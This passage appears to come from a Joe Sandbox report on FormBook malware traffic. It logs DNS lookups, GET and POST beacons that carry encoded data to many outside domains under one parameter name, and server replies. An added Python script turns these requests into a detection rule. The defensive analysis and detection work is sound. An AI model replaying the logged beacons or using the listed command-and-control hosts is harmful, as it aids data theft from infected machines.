          Source: global trafficHTTP traffic detected: GET /7c6d/?wd98XJp=w8YgqO/Zj/36mufrJumMstPGQWcWOvmXve42clWXA0OufJxdz0t5qmDG9Y+qzl9OADQlddr1Os9brfaQNQSPZtNIRBmq9MUfYdPf/ru8jRm7NVZbS2vao50=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.6666111p.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /s5jh/?wd98XJp=1TiKqhVN19vKBh0iYV68FE6kd9yptaYL0yZFpqoiJ2lM+QkJ7dUu1EsavkeNrTvMwGcxWHp0eakXjUqcr3ub0eMvg/6QMTuDK9dTv3I1AhU9igMWM3XHjus=&2hZdq=H6f4R HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.0araba.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
          Source: global traffic | DNS traffic detected: DNS query: www.miningarea.fun
          Source: global traffic | DNS traffic detected: DNS query: www.kosherphonestore.com
          Source: global traffic | DNS traffic detected: DNS query: www.abc8web.com
          Source: global traffic | DNS traffic detected: DNS query: www.threendresses.com
          Source: global traffic | DNS traffic detected: DNS query: www.personalcaresale.shop
          Source: global traffic | DNS traffic detected: DNS query: www.coinwab.com
          Source: global traffic | DNS traffic detected: DNS query: www.mqmsqkw.lol
          Source: global traffic | DNS traffic detected: DNS query: www.synergon.space
          Source: global traffic | DNS traffic detected: DNS query: www.wepayassessments.com
          Source: global traffic | DNS traffic detected: DNS query: www.adoby.xyz
          Source: global traffic | DNS traffic detected: DNS query: www.washio.world
          Source: global traffic | DNS traffic detected: DNS query: www.com-kh.com
          Source: global traffic | DNS traffic detected: DNS query: www.6666111p.vip
          Source: global traffic | DNS traffic detected: DNS query: www.0araba.net
          Source: global traffic | DNS traffic detected: DNS query: www.rtrpodcast.online
          Source: unknown | HTTP traffic detected:
              POST /sm5e/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US
              Accept-Encoding: gzip, deflate, br
              Host: www.abc8web.com
              Origin: http://www.abc8web.com
              Referer: http://www.abc8web.com/sm5e/
              Connection: close
              Content-Length: 204
              Content-Type: application/x-www-form-urlencoded
              Cache-Control: max-age=0
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
              Data Raw: 77 64 39 38 58 4a 70 3d 6c 2b 5a 6d 35 36 4a 6c 6b 53 54 42 56 4a 76 30 56 36 4b 6b 41 4f 4b 4f 69 69 61 4e 55 6a 37 76 7a 31 75 33 4f 65 49 61 57 50 71 48 46 2f 69 67 2f 45 30 76 52 4c 4c 4e 77 6b 4b 34 6b 78 78 6e 56 36 35 61 53 38 59 76 6e 67 70 76 33 6e 37 6f 48 53 45 79 38 38 4e 2f 6f 74 54 6a 41 45 4d 37 47 2f 6f 34 33 4d 48 71 56 5a 4a 32 6b 38 61 4a 67 52 2b 4a 37 43 38 52 75 6c 72 43 36 56 4e 73 74 2f 75 33 51 70 54 69 67 42 71 61 51 43 46 39 55 66 67 69 36 55 51 31 2b 2f 34 39 63 59 35 37 43 4c 38 47 33 66 51 62 6f 6a 73 51 6d 65 64 70 7a 47 7a 61 6d 6e 52 37 74 51 34 34 71 53 57 59 49 67 3d 3d
              Data Ascii: wd98XJp=l+Zm56JlkSTBVJv0V6KkAOKOiiaNUj7vz1u3OeIaWPqHF/ig/E0vRLLNwkK4kxxnV65aS8Yvngpv3n7oHSEy88N/otTjAEM7G/o43MHqVZJ2k8aJgR+J7C8RulrC6VNst/u3QpTigBqaQCF9Ufgi6UQ1+/49cY57CL8G3fQbojsQmedpzGzamnR7tQ44qSWYIg==
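Every request the sandbox captured has the same shape: a path of one short alphanumeric directory (/ghq5/, /uox9/, /7c6d/, /s5jh/, /sm5e/), a query string or form body carrying one long base64-looking value under the same parameter name (wd98XJp) no matter which host is contacted, the same dated Chrome/44 user agent, and Connection: close. The responses that follow are all 404s, so the request shape, not the reply, is what a detection has to key on. The block below is an added example, not part of the Joe Sandbox report and not FormBook's own code: it rebuilds the four GETs and the POST as raw HTTP requests (with the CRLF separators the extraction dropped put back), scores each against those structural indicators, and groups the hosts contacted by parameter name. The path-length bound, the 40-character blob minimum and the four-indicator alert threshold are assumptions tuned to these samples, and the benign control request to www.example.com is constructed.

```python
"""Added example (not from the Joe Sandbox report): a matcher for the beacon shape in
the GET/POST entries above. Requests are rebuilt from the report with the CRLF
separators put back; the thresholds below are assumptions tuned to these samples."""
import re
from urllib.parse import urlsplit

COMMON = ("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,"
          "image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nAccept-Language: en-US\r\n")
UA = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"


def report_get(host, path, blob):  # one of the report's GET beacons as a raw HTTP/1.1 request
    return (f"GET {path}?wd98XJp={blob}&2hZdq=H6f4R HTTP/1.1\r\n{COMMON}"
            f"Host: {host}\r\nConnection: close\r\nUser-Agent: {UA}\r\n\r\n")


POST_REQUEST = (  # the report's POST to www.abc8web.com; the body is its "Data Ascii"
    f"POST /sm5e/ HTTP/1.1\r\n{COMMON}Accept-Encoding: gzip, deflate, br\r\n"
    "Host: www.abc8web.com\r\nOrigin: http://www.abc8web.com\r\n"
    "Referer: http://www.abc8web.com/sm5e/\r\nConnection: close\r\nContent-Length: 204\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nCache-Control: max-age=0\r\n"
    f"User-Agent: {UA}\r\n\r\n"
    "wd98XJp=l+Zm56JlkSTBVJv0V6KkAOKOiiaNUj7vz1u3OeIaWPqHF/ig/E0vRLLNwkK4kxxnV65aS8Yv"
    "ngpv3n7oHSEy88N/otTjAEM7G/o43MHqVZJ2k8aJgR+J7C8RulrC6VNst/u3QpTigBqaQCF9Ufgi6UQ1"
    "+/49cY57CL8G3fQbojsQmedpzGzamnR7tQ44qSWYIg==")
SAMPLE_REQUESTS = [  # the four GETs and the POST listed in the report
    report_get("www.adoby.xyz", "/ghq5/", "dNjYg/LNb+Btw7/gHk7XSMyPk/zPSOV1YOlLUnvgSo8eic1H8Ppx0PY9ldg0aj+ffPmEFDEyAFk9JBqMQ/w/NLyeMKaPgOi3ekgmu34KkG/nLXsYy1o9wJg="),
    report_get("www.washio.world", "/uox9/", "SkqqSrQ8SMo2XL3atDg5EwteixjEHmcOkKNOXL2YXVO5YY42DfvwbKSww9pKtEGGvKt0lrGjy49L8DH+d/eZjL5PtpdyGoJABAcliTTSnjNRJ5qgIg1UjKg="),
    report_get("www.6666111p.vip", "/7c6d/", "w8YgqO/Zj/36mufrJumMstPGQWcWOvmXve42clWXA0OufJxdz0t5qmDG9Y+qzl9OADQlddr1Os9brfaQNQSPZtNIRBmq9MUfYdPf/ru8jRm7NVZbS2vao50="),
    report_get("www.0araba.net", "/s5jh/", "1TiKqhVN19vKBh0iYV68FE6kd9yptaYL0yZFpqoiJ2lM+QkJ7dUu1EsavkeNrTvMwGcxWHp0eakXjUqcr3ub0eMvg/6QMTuDK9dTv3I1AhU9igMWM3XHjus="),
    POST_REQUEST,
]
# Constructed benign request (not from the report): exactly one indicator fires on it.
BENIGN_REQUEST = ("GET /search?q=formbook&page=2 HTTP/1.1\r\nHost: www.example.com\r\n"
                  "Connection: keep-alive\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
                  "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\r\n\r\n")

SHORT_DIR_PATH = re.compile(r"^/[a-z0-9]{3,6}/$")       # "/ghq5/", "/sm5e/"; length bounds assumed
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")  # one long base64-looking value; 40 assumed
LEGACY_UA_MARK = "Chrome/44.0.2403.157"                  # UA carried by every request in the report


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body); header names
    are lower-cased and nothing is percent-decoded."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def split_form(encoded):
    """(key, value) pairs of a query string or form body, left undecoded so a base64
    value keeps its '+' and '/' (urllib's parse_qsl would turn '+' into a space)."""
    return [(key, value) for key, _, value in
            (item.partition("=") for item in encoded.split("&") if item)]


def beacon_indicators(raw):
    """Set of the structural indicators that fire on one request."""
    method, target, headers, body = parse_request(raw)
    parts = urlsplit(target)
    params = split_form(parts.query if method == "GET" else body)
    hits = set()
    if SHORT_DIR_PATH.match(parts.path):
        hits.add("short_dir_path")
    if any(BASE64_BLOB.match(value) for _, value in params):
        hits.add("base64_blob")
    if method == "GET" and len(params) == 2:
        hits.add("two_param_get")
    if (method == "POST" and len(params) == 1
            and headers.get("content-type") == "application/x-www-form-urlencoded"):
        hits.add("single_param_form_post")
    if LEGACY_UA_MARK in headers.get("user-agent", ""):
        hits.add("legacy_chrome_ua")
    if headers.get("connection", "").lower() == "close":
        hits.add("connection_close")
    return hits


def is_beacon(raw, minimum=4):
    """Alert only when several indicators fire together ('minimum' is an assumption);
    an old UA or Connection: close on its own is everyday benign traffic."""
    return len(beacon_indicators(raw)) >= minimum


def hosts_by_param_key(requests):
    """Map each query/body parameter name to the hosts it was sent to; the report
    reuses one key (wd98XJp) against unrelated hosts, which is the pivot for proxy logs."""
    groups = {}
    for raw in requests:
        method, target, headers, body = parse_request(raw)
        payload = urlsplit(target).query if method == "GET" else body
        for key, _ in split_form(payload):
            groups.setdefault(key, set()).add(headers.get("host", ""))
    return groups


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS + [BENIGN_REQUEST]:
        print(parse_request(raw)[2]["host"], is_beacon(raw), sorted(beacon_indicators(raw)))
    print({key: sorted(hosts) for key, hosts in hosts_by_param_key(SAMPLE_REQUESTS).items()})
```

Run as a script: the five report requests each score five indicators and are flagged, the control scores one and is not, and hosts_by_param_key returns wd98XJp mapped to all five hosts. That key-to-many-hosts relation is the query worth running over a proxy log, because the host changes from request to request while the parameter name, path shape and user agent do not. The blob itself is left alone: it is opaque here, and the matcher does not need its contents.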
          Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Date: Tue, 02 Jul 2024 12:07:29 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Vary: Accept-Encoding
              X-Powered-By: PHP/7.4.33
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wgQ6PgazQjAPUs2hqKekXcmDvbNnJlO6Id6UqY8pMnUc5myRrVKxyyC6sEnavsTGfhPch7olsMUBk%2FINfw1pTT0XMj0eLzMq%2FEQ1mWIh1dMeSJsQtHuYNcapZGo41JkSk9SPkanK1AfcS1ZH"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89ce840689ae4205-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 190
          Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Date: Tue, 02 Jul 2024 12:07:31 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Vary: Accept-Encoding
              X-Powered-By: PHP/7.4.33
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=debBEllbuh7hmv%2Fkp%2BYCMaDVvz7Mwcgdti%2BENkmS3GcqLtw7019zPl2UQ01E4vOlOObWvNj3kSAR6GEaZofestAG3IESC%2FT6GeY7Qh4Za1tpYi6qNlfsLT2ESZMeXgyVGF%2Bp9pyA39JOMZfP"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89ce84167bac1821-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 190
          Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Date: Tue, 02 Jul 2024 12:07:34 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Vary: Accept-Encoding
              X-Powered-By: PHP/7.4.33
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B9BYAb5vbW1K6nC6RV4oLXf16PUUuQXZfWNp%2BuEyOlPEOdo89STy8vh%2BorYzM27u9U6trgm3Lgfprxg28XYGrqoPf%2FzuEYHkFsB2d0a%2F%2BjzSxuN%2F9yZb1ZAI9Ro6Qn%2BgqjVO7ci51e2g4QgV"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89ce84263eea8cd4-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 190
          Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Date: Tue, 02 Jul 2024 12:07:36 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Vary: Accept-Encoding
              X-Powered-By: PHP/7.4.33
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4pVlZTadzumTYubhaf45%2BwB%2FNrUygRG3bkw8VZLNM3tXwK%2BTlA00iq3qIhkI%2BUzQdD4cEG2XkKKVD4bt%2FeKFQGjGJvRZE9CqgCFT8qCPVgv80ZuozuWyEjN7wwfT21MMtJbYKKQ6u0n2Fnz"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 89ce843659f5437b-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
          Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Connection: close
              x-powered-by: PHP/5.6.40
              content-type: text/html; charset=UTF-8
              content-length: 810
              content-encoding: br
              vary: Accept-Encoding
              date: Tue, 02 Jul 2024 12:08:31 GMT
              server: LiteSpeed
              Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 d7 ce f1 a3 55 51 11 eb 5b 75 ab 6e c9 0a c3 c1 34 36 af 88 38 66 27 85 b7 59 a5 a8 0d 68 ca 6f f8 c5 a5 06 94 fc e1 e1 4a 22 3e 29 92 5a e0 ad 92 7a 16 1c 07 b3 50 be 91 13 b8 92 19 88 02 01 28 dd a0 57 a4 fe 44 cd 72 ba c5 ba b1 26 b5 1a 5a 27 f5 6c d9 4c 65 2a 5b 0d 48 b1 ef bf de 16 85 ac d9 da 2c 45 1d ea c2 a2 ef 69 c1 3d a0 c5 71 e4 07 e2 45 6b 84 cf 34 27 43 9e a6 fe 15 ea 69 38 ac ac f3 8b a1 42 8a b6 4f 70 3e 43 a5 1d e4 ed a9 19 9b 74 70 8d 4b c2 a9 29 b4 ca 82 44 d4 40 a5 6c dc de a8 e9 b2 8b a7 61 99 52 d3 65 97 c8 70 99 4d 78 ae 40 a6 6a 60 78 b7 56 85 14 af dd 48 16 21 44 ff e0 f9 7c 4e c2 6c c9 37 ce 26 61 c2 8a aa 32 de 05 47 f6 cb 3c ce 67 b4 08 1d 05 06 8b 0e 7a 72 e4 b1 6a 41 0a 18 25 cd 1a c1 15 d8 a7 58 24 44 9f fa fb 92 2a 6b 28 62 10 38 ae 7d e9 a5 e0 4f 0b 29 e0 fc 4b df d7 e4 8f 1d 8d 33 84 65 2e 7b 13 41 49 cb 64 a8 5a ec 0c 06 ca 5f 84 db 19 ce 54 c6 e2 d7 81 24 91 54 5e f7 16 c3 02 d3 cc 68 0d 3e 93 d5 d5 18 42 ef 2c 63 cf c7 8e be 4f bf 80 c5 d1 c0 e4 17 5a 36 9a f4 c1 72 42 93 7d 1c 51 16 10 62 93 14 6d f3 a4 cf 63 fd 67 d4 ce f1 aa 90 22 2d fc 06 fc f9 09 99 52 59 9c a9 ec 1a 62 78 67 68 c1 b3 d3 76 86 6c dc 69 bd 22 fd 46 39 90 9e 5b e6 29 e5 07 e6 46 9e ea 11 b3 4f d8 a7 58 80 1e 10 70 2c 0d db b9 6a cb c4 7e c3 3d ff fd 75 06 e7 71 c1 7d 00 ed 46 b2 f3 14 de 0e d6 f8 29 ca f7 e1 ce 04 da 05 46 5f 2d 88 51 00 9b 9a 0c ed 53 14 b7 36 0d 1e 71 69 cb e3 50 48 01
              Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0
          Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Connection: close
              x-powered-by: PHP/5.6.40
              content-type: text/html; charset=UTF-8
              content-length: 810
              content-encoding: br
              vary: Accept-Encoding
              date: Tue, 02 Jul 2024 12:08:34 GMT
              server: LiteSpeed
              Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 d7 ce f1 a3 55 51 11 eb 5b 75 ab 6e c9 0a c3 c1 34 36 af 88 38 66 27 85 b7 59 a5 a8 0d 68 ca 6f f8 c5 a5 06 94 fc e1 e1 4a 22 3e 29 92 5a e0 ad 92 7a 16 1c 07 b3 50 be 91 13 b8 92 19 88 02 01 28 dd a0 57 a4 fe 44 cd 72 ba c5 ba b1 26 b5 1a 5a 27 f5 6c d9 4c 65 2a 5b 0d 48 b1 ef bf de 16 85 ac d9 da 2c 45 1d ea c2 a2 ef 69 c1 3d a0 c5 71 e4 07 e2 45 6b 84 cf 34 27 43 9e a6 fe 15 ea 69 38 ac ac f3 8b a1 42 8a b6 4f 70 3e 43 a5 1d e4 ed a9 19 9b 74 70 8d 4b c2 a9 29 b4 ca 82 44 d4 40 a5 6c dc de a8 e9 b2 8b a7 61 99 52 d3 65 97 c8 70 99 4d 78 ae 40 a6 6a 60 78 b7 56 85 14 af dd 48 16 21 44 ff e0 f9 7c 4e c2 6c c9 37 ce 26 61 c2 8a aa 32 de 05 47 f6 cb 3c ce 67 b4 08 1d 05 06 8b 0e 7a 72 e4 b1 6a 41 0a 18 25 cd 1a c1 15 d8 a7 58 24 44 9f fa fb 92 2a 6b 28 62 10 38 ae 7d e9 a5 e0 4f 0b 29 e0 fc 4b df d7 e4 8f 1d 8d 33 84 65 2e 7b 13 41 49 cb 64 a8 5a ec 0c 06 ca 5f 84 db 19 ce 54 c6 e2 d7 81 24 91 54 5e f7 16 c3 02 d3 cc 68 0d 3e 93 d5 d5 18 42 ef 2c 63 cf c7 8e be 4f bf 80 c5 d1 c0 e4 17 5a 36 9a f4 c1 72 42 93 7d 1c 51 16 10 62 93 14 6d f3 a4 cf 63 fd 67 d4 ce f1 aa 90 22 2d fc 06 fc f9 09 99 52 59 9c a9 ec 1a 62 78 67 68 c1 b3 d3 76 86 6c dc 69 bd 22 fd 46 39 90 9e 5b e6 29 e5 07 e6 46 9e ea 11 b3 4f d8 a7 58 80 1e 10 70 2c 0d db b9 6a cb c4 7e c3 3d ff fd 75 06 e7 71 c1 7d 00 ed 46 b2 f3 14 de 0e d6 f8 29 ca f7 e1 ce 04 da 05 46 5f 2d 88 51 00 9b 9a 0c ed 53 14 b7 36 0d 1e 71 69 cb e3 50 48 01
              Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0
          Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Connection: close
              x-powered-by: PHP/5.6.40
              content-type: text/html; charset=UTF-8
              content-length: 810
              content-encoding: br
              vary: Accept-Encoding
              date: Tue, 02 Jul 2024 12:08:37 GMT
              server: LiteSpeed
              Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 d7 ce f1 a3 55 51 11 eb 5b 75 ab 6e c9 0a c3 c1 34 36 af 88 38 66 27 85 b7 59 a5 a8 0d 68 ca 6f f8 c5 a5 06 94 fc e1 e1 4a 22 3e 29 92 5a e0 ad 92 7a 16 1c 07 b3 50 be 91 13 b8 92 19 88 02 01 28 dd a0 57 a4 fe 44 cd 72 ba c5 ba b1 26 b5 1a 5a 27 f5 6c d9 4c 65 2a 5b 0d 48 b1 ef bf de 16 85 ac d9 da 2c 45 1d ea c2 a2 ef 69 c1 3d a0 c5 71 e4 07 e2 45 6b 84 cf 34 27 43 9e a6 fe 15 ea 69 38 ac ac f3 8b a1 42 8a b6 4f 70 3e 43 a5 1d e4 ed a9 19 9b 74 70 8d 4b c2 a9 29 b4 ca 82 44 d4 40 a5 6c dc de a8 e9 b2 8b a7 61 99 52 d3 65 97 c8 70 99 4d 78 ae 40 a6 6a 60 78 b7 56 85 14 af dd 48 16 21 44 ff e0 f9 7c 4e c2 6c c9 37 ce 26 61 c2 8a aa 32 de 05 47 f6 cb 3c ce 67 b4 08 1d 05 06 8b 0e 7a 72 e4 b1 6a 41 0a 18 25 cd 1a c1 15 d8 a7 58 24 44 9f fa fb 92 2a 6b 28 62 10 38 ae 7d e9 a5 e0 4f 0b 29 e0 fc 4b df d7 e4 8f 1d 8d 33 84 65 2e 7b 13 41 49 cb 64 a8 5a ec 0c 06 ca 5f 84 db 19 ce 54 c6 e2 d7 81 24 91 54 5e f7 16 c3 02 d3 cc 68 0d 3e 93 d5 d5 18 42 ef 2c 63 cf c7 8e be 4f bf 80 c5 d1 c0 e4 17 5a 36 9a f4 c1 72 42 93 7d 1c 51 16 10 62 93 14 6d f3 a4 cf 63 fd 67 d4 ce f1 aa 90 22 2d fc 06 fc f9 09 99 52 59 9c a9 ec 1a 62 78 67 68 c1 b3 d3 76 86 6c dc 69 bd 22 fd 46 39 90 9e 5b e6 29 e5 07 e6 46 9e ea 11 b3 4f d8 a7 58 80 1e 10 70 2c 0d db b9 6a cb c4 7e c3 3d ff fd 75 06 e7 71 c1 7d 00 ed 46 b2 f3 14 de 0e d6 f8 29 ca f7 e1 ce 04 da 05 46 5f 2d 88 51 00 9b 9a 0c ed 53 14 b7 36 0d 1e 71 69 cb e3 50 48 01
              Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0
          Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Connection: close
              x-powered-by: PHP/5.6.40
              content-type: text/html; charset=UTF-8
              content-length: 2247
              date: Tue, 02 Jul 2024 12:08:39 GMT
              server: LiteSpeed
